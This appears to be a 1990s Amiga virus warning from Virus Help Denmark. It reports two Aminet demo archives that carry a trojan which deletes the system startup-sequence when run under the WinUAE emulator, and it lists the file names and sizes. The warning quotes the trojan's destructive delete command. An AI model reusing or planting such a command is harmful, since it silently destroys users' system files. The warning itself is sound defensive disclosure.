Virus Warning - Virus Help Team

Denmark & Canada

Trojans found on AmiNet

........................  VIRUS HELP DENMARK  ......................

Hi All....

Two archives found on Aminet contains a new trojan. It is said to be
AGA  demos, but if you run these demo's on a PC using 'WinUAE', your
system will be deleted. These demos' comes from a Polish demo group.
why they would program something like this, I don't know.

This is some info about the two archives:

Trojan name... : AME-DSD Trojan (Name might be changed later)
Trojan file... : dsd-main
Trojan size... : 93.924 bytes
Trojan archive : AME-DSD.lha
Archive size.. : 6.927.166 bytes
Archive info.. : Dog Star Descends by Amnesty (CGX&AHI compatibile)

Trojan name... : PSL-KMJ Trojan (Name might be change later)
Trojan file... : main
Trojan size... : 49.308 bytes
Trojan archive : PSL-KMJ.lha
Archive size.. : 5.530.365 bytes
Archive info.. : Kiss My Jazz by Pic Saint Loup (AGA/CGX)

In the code for these archives you can read:

> ------------ Code start -----------------------

Warning!!! UAE System for lamers detected!!!
-  System will reboot after mouse button...
run c:delete s:startup-sequence force quiet >NIL:

> ------------ Code end -------------------------

It  is  not legal to release destructive programs to the public, and
we will see what we can  do with  this. In  almost every country the
programmer of such destructive progrmas can go to jail for this kind
of programming.

The xvs.library package will be released very soon.....

Thanks to 'Urban' for the info about the archive.

      __      Jan Andersen     E-Mail..:
 __  ///      ------------        FidoNet.:  2:237/38.100
 \\\///    Virus Help Denmark        AmyNet..: 39:140/127.100
  \XX/             VirNet..: 9:451/247.0

... Did you know, that the newest version of xvs.library is v33.36 !!

Virus Help Team
Denmark & Canada
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